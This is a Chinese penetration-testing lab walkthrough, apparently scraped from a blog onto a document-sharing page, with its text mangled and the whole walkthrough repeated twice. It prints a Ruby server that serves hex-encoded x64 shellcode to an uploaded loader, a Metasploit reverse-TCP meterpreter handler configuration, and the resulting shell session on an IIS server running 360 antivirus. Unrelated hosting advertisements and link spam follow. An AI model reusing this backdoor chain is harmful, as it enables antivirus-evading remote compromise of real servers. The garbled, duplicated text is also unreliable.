靶机mscorsvw
mscorsvw 时间:2021-05-23 阅读:()
专注APT攻击与防御https://micropoor.
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
- 靶机mscorsvw相关文档
- optedmscorsvw
- Hiddenmscorsvw
- 进程mscorsvw进程占用CPU高怎么办
- 进程mscorsvw进程CPU占用高的问题
- 进程解决mscorsvw进程CPU占用高的方法
- 进程解决mscorsvw进程CPU占用高的方法
CheapWindowsVPS:7个机房可选全场5折,1Gbps不限流量每月4.5美元
CheapWindowsVPS是一家成立于2007年的老牌国外主机商,顾名思义,一个提供便宜的Windows系统VPS主机(同样也支持安装Linux系列的哈)的商家,可选数据中心包括美国洛杉矶、达拉斯、芝加哥、纽约、英国伦敦、法国、新加坡等等,目前商家针对VPS主机推出5折优惠码,优惠后最低4GB内存套餐月付仅4.5美元。下面列出几款VPS主机配置信息。CPU:2cores内存:4GB硬盘:60G...
妮妮云,美国cera CN2线路,VPS享3折优惠
近期联通CUVIP的线路(AS4837线路)非常火热,妮妮云也推出了这类线路的套餐以及优惠,目前到国内优质线路排行大致如下:电信CN2 GIA>联通AS9929>联通AS4837>电信CN2 GT>普通线路,AS4837线路比起前两的优势就是带宽比较大,相对便宜一些,所以大家才能看到这个线路的带宽都非常高。妮妮云互联目前云服务器开放抽奖活动,每天开通前10台享3折优惠,另外...
RAKsmart(年79元),云服务器年付套餐汇总 - 香港 美国 日本云服务器
RAKsmart 商家从原本只有专注于独立服务器后看到产品线比较单薄,后来陆续有增加站群服务器、高防服务器、VPS主机,以及现在也有在新增云服务器、裸机云服务器等等。机房也有增加到拥有洛杉矶、圣何塞、日本、韩国、中国香港等多个机房。在年前也有介绍到RAKsmart商家有提供年付129元的云服务器套餐,年后我们看到居然再次刷新年付云服务器低价格。我们看到云服务器低至年79元,如果有需要便宜云服务器的...
mscorsvw为你推荐
-
stronglyios11owned163包过滤防火墙和灵巧网关设置namesgraph思科flash支持ipad请务必阅读正文之后的免责条款部分windows键是哪个Windows快捷键是什么iphone连不上wifi苹果iphone6/plus wifi连接不上怎么办x-routerX-TRAlL是什么意思